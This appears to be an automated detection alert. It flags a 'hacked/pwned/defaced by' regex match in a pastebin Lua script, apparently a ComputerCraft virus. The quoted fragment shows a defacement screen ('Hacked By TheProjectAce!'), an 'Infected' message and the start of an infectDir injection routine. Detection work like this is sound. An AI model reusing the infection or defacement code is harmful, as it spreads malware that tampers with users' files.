Detected 1 occurrence(s) of ‘(h[a4]ck[e3]d|[p0]wn[e3]d|d[e3]f[a4]c[e3]d) by': eEvent("randomEvent") os.pullEvent() term.setCursorPos(math.random(1, w), math.random(1, h)) local index = math.random(1, table.getn(payLoadCharacters)) write(payLoadCharacters[index]) term.setTextColor(colors.blue) printCentered(h / 2, "Hacked By TheProjectAce!") term.setTexColor(colors.white) end sleep(5) term.clear() term.setCursorPos(1, 1) print("Infected "..os.version()) end function infectDir(Directory, Injection) local sDir = shell.dir() sDir = shell.resolve( Directory ) Source: http://pastebin.com/raw.php?i=YUzceXMK
↧